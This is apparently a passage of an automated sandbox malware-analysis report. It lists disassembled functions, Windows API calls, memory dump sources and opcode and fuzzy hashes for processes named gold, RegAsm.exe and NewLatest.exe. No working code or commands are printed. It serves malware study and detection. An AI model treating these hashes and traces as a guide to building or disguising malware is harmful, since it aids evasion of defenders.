Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: de552e95adcc8c20be749162f1542e3849cdc33a16d8eb709f29b5aac9b4d700
Instruction ID: 0c3d4e3312f92573607933132e9bc1471c1ae39486e9c28fad75db9f59ccef77
Opcode Fuzzy Hash: de552e95adcc8c20be749162f1542e3849cdc33a16d8eb709f29b5aac9b4d700
Instruction Fuzzy Hash: FA41B334A00309EFCF10DF68C885A9EBBB5AF55319F148059EC28AF352D7319A49CBD1

Function 0015D14D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0015D172

Strings

RCC, xrefs: 0015D18C
MOC, xrefs: 0015D184

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 78066b92d6c3e1834de7554ca872565fcb964193077f57ea0432dae8b865e4b9
Instruction ID: c2925bef1d80c7ef5aef4069a8df5eb274d8e5a3c7fa34e459c1c844e89e57cb
Opcode Fuzzy Hash: 78066b92d6c3e1834de7554ca872565fcb964193077f57ea0432dae8b865e4b9
Instruction Fuzzy Hash: 22417871900209EFDF25CF98DC81AAEBBB5BF08301F188199FD24AB211D335D954DB51

Function 00156F01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00156F89
RaiseException.KERNEL32(?,?,?,?,00000000,00000000), ref: 00156FAE

Part of subcall function 0015A4B0: RaiseException.KERNEL32(E06D7363,00000001,00000003,0015A1CE,?,?,?,?,0015A1CE,?,0017CB74), ref: 0015A510

Part of subcall function 0015E0BB: IsProcessorFeaturePresent.KERNEL32(00000017,0015DE42,?,0015DDB1,00000001,00000016,0015DFC0,?,?,?,?,?,00000000), ref: 0015E0D7

Strings

csm, xrefs: 00156F3D

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 2db93ba7fad635f617efed9327c8dc907eff9bf2f2bb280467f2fc4529870189
Instruction ID: eb768984477abb38ce5f3dd679fdb3fa3aeb0f06b2ea8b515141fb176484b2fd
Opcode Fuzzy Hash: 2db93ba7fad635f617efed9327c8dc907eff9bf2f2bb280467f2fc4529870189
Instruction Fuzzy Hash: FE219D32D00218DBCF24DFA4E855AAEB7B9AF54712F94440AEC25AF650CB70AD4DCBD1

Function 001523C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001523C5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0015240A

Part of subcall function 0015763B: _Yarn.LIBCPMT ref: 0015765A
Part of subcall function 0015763B: _Yarn.LIBCPMT ref: 0015767E

Strings

bad locale name, xrefs: 00152418

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: c4905aac61116fb535004747d2272b303b0b7e155fcda49a16e9e65d4a7e8648
Instruction ID: dc25d8af5f4228df0d3cff566321d49a3a3b5544962426d50184978ff6a4e3cd
Opcode Fuzzy Hash: c4905aac61116fb535004747d2272b303b0b7e155fcda49a16e9e65d4a7e8648
Instruction Fuzzy Hash: BBF0F461505B408EE3709F798505747BAE0AF29311F048A1EE89A8BA52E375E508CBE6

Analysis Process: RegAsm.exePID: 7772, Parent PID: 7752COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	95
Total number of Limit Nodes:	8

Executed Functions

Function 0261AE30 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0261B086

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2cbe86b075a412a42b75d9ace24700e9e31fa8bb9d238f43687fe92b634a3ff7
Instruction ID: 5310f366791d95314572a4576e9618d032d6a301b0c1f29f509c5dac55ede3b3
Opcode Fuzzy Hash: 2cbe86b075a412a42b75d9ace24700e9e31fa8bb9d238f43687fe92b634a3ff7
Instruction Fuzzy Hash: 687132B0A01B058FD724DF69D54079ABBF2BF88204F04892DD08AD7B50DB35F84ACB91

Function 04DB0BFC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04DB4381

Memory Dump Source

Source File: 0000000D.00000002.3888382099.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4db0000_RegAsm.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: df934cc9c88ca722e7c37a33540b9787d101e9c5b82f2eb900fed7e0e0b6c9fd
Instruction ID: b8955cc7d66eaa4d29ca4d9bb2957fed33ef77e5c7c97e231b168b068aae1ebc
Opcode Fuzzy Hash: df934cc9c88ca722e7c37a33540b9787d101e9c5b82f2eb900fed7e0e0b6c9fd
Instruction Fuzzy Hash: 9A4127B4A00309DFDB14CF99C488AAABBF5FF88314F288559D559AB321D775A841CBA0

Function 02614248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026159F1

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 15862ec5720644aa766088614677e24dddee1557f310a6bb63db01b7f06c2170
Instruction ID: 57f2ad635e47ac76adfc6fc4050bd7a22c55ff3a2de0397fa434768eaca622e0
Opcode Fuzzy Hash: 15862ec5720644aa766088614677e24dddee1557f310a6bb63db01b7f06c2170
Instruction Fuzzy Hash: B141E2B0C00719CBEB24DFAAC844B8DFBB5FF48314F64816AD409AB250DB75694ACF90

Function 02615935 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 026159F1

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: bbe71eff8ce8cd8394d6f662ba7509fa495bbc09b5a9590b8fc28a464fd17670
Instruction ID: f06cb9f7fc75dcf7675605abc14b4a32cf930043958d4f2fee8698135611328c
Opcode Fuzzy Hash: bbe71eff8ce8cd8394d6f662ba7509fa495bbc09b5a9590b8fc28a464fd17670
Instruction Fuzzy Hash: 5941E2B1D00769CBEB24DFA9C884B8DFBB1BF48304F24816AD409AB251DB75694ACF51

Function 0261C9A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0261D2C6,?,?,?,?,?), ref: 0261D387

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6a1c8b44e6d4b32830c55beb5e046d3ef25b7822491ce5c26f5b4244f8243841
Instruction ID: e7538216ff69fb1d07e48d7e50783f94437ba1b7c44045f197c7705964e54a77
Opcode Fuzzy Hash: 6a1c8b44e6d4b32830c55beb5e046d3ef25b7822491ce5c26f5b4244f8243841
Instruction Fuzzy Hash: 7021E3B5D003489FDB10CF9AD984ADEFBF4EB48320F14841AE918A3310D774A954CFA5

Function 0261D2F9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0261D2C6,?,?,?,?,?), ref: 0261D387

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5e9d21f7627130680b9db8b26a233906a202e7b0c0bf7e061a86086835f5ed25
Instruction ID: cc1f00dee1b0bb4fc0b04b57d55cff97d045c05ac10d97177552b1372dbb2221
Opcode Fuzzy Hash: 5e9d21f7627130680b9db8b26a233906a202e7b0c0bf7e061a86086835f5ed25
Instruction Fuzzy Hash: 722103B5D002089FDB10CF9AD984ADEBBF4EB48324F14842AE918A3310C778A954CFA0

Function 0261B2A0 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0261B101,00000800,00000000,00000000), ref: 0261B312

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f324ff62061a6255cc0ccebb850f23d821fd161aac2b263a4c886a2949cbba80
Instruction ID: 5b37522e1c23c18c87b9b489c955ee97119c4ce134c91163aa1a1081f560d376
Opcode Fuzzy Hash: f324ff62061a6255cc0ccebb850f23d821fd161aac2b263a4c886a2949cbba80
Instruction Fuzzy Hash: 691117B6D003498FDB10CFAAD944ADEFBF4EB48314F15846ED429A7200C775A549CFA1

Function 0261A870 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0261B101,00000800,00000000,00000000), ref: 0261B312

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5bed96b548793254859ac1e2aa24aefa4a22d3ab2e509542d3ca6d051107ac54
Instruction ID: c0563340d5a9fbf65bf15ac64dd3ab5d8a03453f814a7858932ef2104d678ef6
Opcode Fuzzy Hash: 5bed96b548793254859ac1e2aa24aefa4a22d3ab2e509542d3ca6d051107ac54
Instruction Fuzzy Hash: DF1144B6C003498FDB20CF9AC444AAEFBF4EB48314F14842EE819A7300C774A945CFA0

Function 0261B020 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0261B086

Memory Dump Source

Source File: 0000000D.00000002.3812867217.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2610000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b5ea8ccf29e89545becda4c44cb37a0a0f53be6d9953e5c739503728097389b6
Instruction ID: 33e0c17426e47d4c70777bb8329131c4389e0b1b24eb4e8181a04f0db2b37c3a
Opcode Fuzzy Hash: b5ea8ccf29e89545becda4c44cb37a0a0f53be6d9953e5c739503728097389b6
Instruction Fuzzy Hash: 261102B5C003498FDB20DF9AD544A9EFBF4AB48325F14842AD428B7210C375A545CFA1

Function 05AE0900 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b6d81563de18d61c6db39a197c8b284ca0090d63da1d746474b08bfde3ce35
Instruction ID: f6f0fafbd9ac24b7db9a40d51efcf2cb28d7dafbe1e9f42555ef47a43d6ba9f7
Opcode Fuzzy Hash: f8b6d81563de18d61c6db39a197c8b284ca0090d63da1d746474b08bfde3ce35
Instruction Fuzzy Hash: E1217F35B002058FDB24DF65D4C48BEB7B2FB88314B248969D95AD7351EB71EC06CBA1

Function 025BD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc6360443202abfd2461952efad1da30ff479df57f645b16b2f189c5ffc77a30
Instruction ID: 091099ed102b0efcb509ff8056b0b147333ae2992b6bd090aebdc5c9c603f78d
Opcode Fuzzy Hash: fc6360443202abfd2461952efad1da30ff479df57f645b16b2f189c5ffc77a30
Instruction Fuzzy Hash: 48210372605204DFDB1ADF10D9C0B66BF75FF84324F24C6A9D8090B246C37AE45ACAA6

Function 025BD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6e62fd1a40319d6b4c5ef37f15fdad7275096b92f2e5b96fadced9d0031d4a
Instruction ID: 952ffd5c4f87e38f1324b55fc475d84b328a5702e0f4cbe39328b71ea8d3cb36
Opcode Fuzzy Hash: fe6e62fd1a40319d6b4c5ef37f15fdad7275096b92f2e5b96fadced9d0031d4a
Instruction Fuzzy Hash: 3B212272605240DFDB16DF14D9C0B66BF75FF88328F24C569E8090B286C336D856CBA6

Function 05AE08F0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173fb1e223eb245a7015299801aee21eccd556ed752aadc651100d64b6019bcb
Instruction ID: 257897fc4a45a4488f58de1cd8bfccbda602caed0f1eb99a013f46546d3929e4
Opcode Fuzzy Hash: 173fb1e223eb245a7015299801aee21eccd556ed752aadc651100d64b6019bcb
Instruction Fuzzy Hash: D9218075B402018FDB24DF61C4C88BEBBB2FB892147248559D956D7391EB71EC06CFA1

Function 025CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3801580530.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25cd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad90061ca1a47619ac18c16903e2b6e186d2232b9f75d804cb85aa9a64f3e4f8
Instruction ID: fb26dce356b58e15bbbcc592ba39c2e78089101d98f90aa734ace12b99f47c73
Opcode Fuzzy Hash: ad90061ca1a47619ac18c16903e2b6e186d2232b9f75d804cb85aa9a64f3e4f8
Instruction Fuzzy Hash: BC21FF756052009FDB14DF58D984B26BBA1FB84324F30C9BDD84A9B246E33AD847CA66

Function 025CD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3801580530.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25cd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a9e3b09d1a6e9de328a2d060d01e6e6464e0bc7a007546ceab22a223d4c4e3f
Instruction ID: 1c3733db1526d13cf5c42a5f6c466bc7c4a4c5fe4772528f662d928528b2555f
Opcode Fuzzy Hash: 2a9e3b09d1a6e9de328a2d060d01e6e6464e0bc7a007546ceab22a223d4c4e3f
Instruction Fuzzy Hash: 5B2180755093C08FCB12CF24D994715BF71FB46224F28C5EED8898B667D33A980ACB62

Function 05AE00CD Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28b5f8ffb4f1123524d5b458f23a44569fd61cf1b6fc5da1131be2d4e6e38ac
Instruction ID: df7826b8c2a500bd79edc4a150c4913dd4301696973c6d0e590e9c675bbb9c9a
Opcode Fuzzy Hash: b28b5f8ffb4f1123524d5b458f23a44569fd61cf1b6fc5da1131be2d4e6e38ac
Instruction Fuzzy Hash: 05110D39B002049FDB45EB64D898B6E77E2FFC8201B1440A8E906DB365DB72DD02CB90

Function 025BD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
Instruction ID: e0ce6af0bb12653b6b803f4107da734467aa1ff8317a41b6613c3491ed86e77e
Opcode Fuzzy Hash: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
Instruction Fuzzy Hash: 00112676504280CFCB06CF00D9C0B56BF71FF84324F24C6A9D8090B616C37AE45ACBA2

Function 025BD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
Instruction ID: edcfcf7b93006d60a012dcba7db8b0b22c0879b15cf815a77542ae9b5ddacb22
Opcode Fuzzy Hash: e83108a828416d88d7f272b3f2755be97ddf656ef7a6276a7e4349741c6bac78
Instruction Fuzzy Hash: 3E11E676504280CFCB16CF14D9C4B56BF71FF84328F24C6A9D8494B656C33AD856CBA1

Function 05AE0878 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1644394e6c3948428c29dbe2ec37bf60b9d4c2cc77702cafeea9df92c76b5fa
Instruction ID: 7cf1bfb3f306d9a5a0b4c11878c5d9a97e088847fc70dc22b86c803af5cea94e
Opcode Fuzzy Hash: d1644394e6c3948428c29dbe2ec37bf60b9d4c2cc77702cafeea9df92c76b5fa
Instruction Fuzzy Hash: D201B535F001068B8B14DB59D4C48EFBBB6FB88314B20806AD916D7340DB71A916CBD1

Function 05AE0869 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ca5b95510918873e59c8f3b1e6b08c42ccec64fce8885c75ffc46946f5b5f2
Instruction ID: 824f7868bf27c0ee2a531606491b46c30a9a78db1de3c3f9384acc6763e540ad
Opcode Fuzzy Hash: c8ca5b95510918873e59c8f3b1e6b08c42ccec64fce8885c75ffc46946f5b5f2
Instruction Fuzzy Hash: F001B135B006068BCB14DB64C4859AEBBB6FB88310B24806AD90697341DA70A806CBD1

Function 05AE0190 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d85cd994b6f6595966374d9fe2c31a47ea5816bd65bbd576571ceab6eca810
Instruction ID: 1fd27c39aa2dccac75e73542785bef3e2453e89a8e74e96b24acb2a3ff950746
Opcode Fuzzy Hash: f5d85cd994b6f6595966374d9fe2c31a47ea5816bd65bbd576571ceab6eca810
Instruction Fuzzy Hash: C1111B397001049FDB44DBA8D898FADB7F2FF88300F144098E9069B3A0CB72AD02CB90

Function 025BD655 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e88b14ced3205c365854055ade37ba5533a61c2411d7e0616f31a8bca35c12
Instruction ID: d91705cda6b6b256f870ba24b04f84627b7ea5d3c0b92b62329789dae4f54d25
Opcode Fuzzy Hash: f0e88b14ced3205c365854055ade37ba5533a61c2411d7e0616f31a8bca35c12
Instruction Fuzzy Hash: 76012B311063449EE7219F35CDC47A6BFA8EF41225F18C81AED0C4F282C7799845CABA

Function 025BD5F3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5912b18aa15c6b044ebd1eba8da09c8c2c67cef492f5af0a11e80cdc3d59fd7e
Instruction ID: 92004072139df5280b004cc528383858de1b5484568f81a160f6ee7eed2427c1
Opcode Fuzzy Hash: 5912b18aa15c6b044ebd1eba8da09c8c2c67cef492f5af0a11e80cdc3d59fd7e
Instruction Fuzzy Hash: 1FF049B6200600AF87208F0ACD84C23FBB9FFD4634319C46AEC4A4B612C631EC41CAA0

Function 025BD654 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40a2438d410ecf37ae0af6066e7451dff9ba85504218a704b1b9c10aeb69bf9
Instruction ID: 7c4a2ec325d4900e11f0839a62b1d81bc24ff2f7cd8e9afbe17fc1e2e915d440
Opcode Fuzzy Hash: c40a2438d410ecf37ae0af6066e7451dff9ba85504218a704b1b9c10aeb69bf9
Instruction Fuzzy Hash: A7F0F6720063449EE7218F16CD84B62FFA8EF40735F18C45AED0C4B282C3789844CBB5

Function 025BD5E4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3800838937.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_25bd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d2ce926a0178862fcfecd9f34abf24b2f9d91bb67ff30e1dfe5027623f6495
Instruction ID: 97367ba6fd448fa361608c1885869d8c7e2486dddb454094f06833f7cff2a010
Opcode Fuzzy Hash: f1d2ce926a0178862fcfecd9f34abf24b2f9d91bb67ff30e1dfe5027623f6495
Instruction Fuzzy Hash: 27F03C75105A80AFD7268F16CD84C62BFB9FF856607198489E88A4B212C631FC42CB60

Function 05AE01A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3895338961.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5ae0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ef6cf0409ffe8efd3105af0359abc1cd65afadc4fcffc1d360eefb76a91d92
Instruction ID: 038609607655620c43819ef88652fc8c28f21ead2a1ddfaae7eb8636e068c4a4
Opcode Fuzzy Hash: d5ef6cf0409ffe8efd3105af0359abc1cd65afadc4fcffc1d360eefb76a91d92
Instruction Fuzzy Hash: 8FC04C2281E3D1AED713963054681457F716E7321035A4597C681960579E14868EC325

Analysis Process: NewLatest.exePID: 6668, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.3%
Total number of Nodes:	550
Total number of Limit Nodes:	29

Executed Functions

Function 005FA909 Relevance: 33.0, APIs: 15, Strings: 3, Instructions: 1503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryA.KERNEL32(00000000,52CC3793,00000000), ref: 005FA90C

Strings

VUUU, xrefs: 005FAE82
@3P, xrefs: 005FB821
de, xrefs: 005FAF4E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
